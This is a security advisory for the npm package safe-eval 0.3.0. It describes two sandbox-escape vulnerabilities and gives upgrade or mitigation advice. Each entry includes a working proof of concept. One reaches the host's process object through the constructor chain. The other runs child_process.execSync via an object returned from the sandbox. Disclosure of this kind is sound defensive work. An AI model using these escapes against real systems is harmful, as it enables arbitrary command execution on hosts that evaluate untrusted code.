safe-eval@0.3.0

Vulnerabilities

2 via 2 paths


critical severity

Sandbox Escaping

  • Vulnerable module: safe-eval
  • Introduced through: safe-eval@0.3.0

Detailed paths

  • Introduced through: safe-eval@0.3.0
    Remediation: Upgrade to safe-eval@0.4.0.

Overview

safe-eval is a version of eval that claims to be safer.

Affected versions of this package are vulnerable to Sandbox Escaping. Input is passed to safeEval without any sanitization, and the code runs in a Node vm context whose global is backed by a plain host object. From that global, `this.constructor` is the host's Object and `this.constructor.constructor` is the host's Function, which compiles code that runs outside the sandbox with full access to the standard library (process, require and so on).

Proof of Concept:

var safeEval = require('safe-eval');
// `this` is the sandbox's global, a plain host object, so this.constructor.constructor is the host's Function;
// the compiled function runs in the host realm, where `process` is in scope, and the host process exits.
safeEval("this.constructor.constructor('return process')().exit()");

Remediation

Upgrade safe-eval to version 0.4.0 or higher.

high severity

Sandbox Escape

  • Vulnerable module: safe-eval
  • Introduced through: safe-eval@0.3.0

Detailed paths

  • Introduced through: safe-eval@0.3.0

Overview

safe-eval describes itself as a safer version of eval().

Affected versions of this package are vulnerable to Sandbox Escape. Untrusted code can return an object whose methods are later invoked by host code, for example when the result is logged or inspected. Those methods receive host-realm objects as arguments, and from any such object the host's Function constructor is reachable, so an attacker can run arbitrary commands on the host machine.

PoC by Anirudh Anand (for Node 12.13.0):

const safeEval = require('safe-eval');

// The payload never touches the host by itself. It builds an object whose
// `stack` property has an attacker-defined match() method and hands that
// object back as the sandbox's result.
const theFunction = function() {
   const bad = new Error();
   // With a null prototype the object no longer looks like an Error to the host.
   bad.__proto__ = null;
   bad.stack = {
      match(outer) {
         // `outer` is whatever object the host passes to match(); its
         // constructor chain leads to the host's Function, so the compiled
         // code runs in the host realm and reaches process and child_process.
         throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
      }
   };
   return bad;
};

const untrusted = `(${theFunction})()`;
// The escape fires here, not inside safeEval: the host inspects the returned
// object, calls match() on its stack with a host-realm argument, and the
// command output surfaces as the thrown value.
console.log(safeEval(untrusted));

Remediation

There is no fixed version for safe-eval. Stop passing untrusted input to safeEval; Node's vm module, which safe-eval wraps, is documented as not being a security mechanism for running untrusted code.
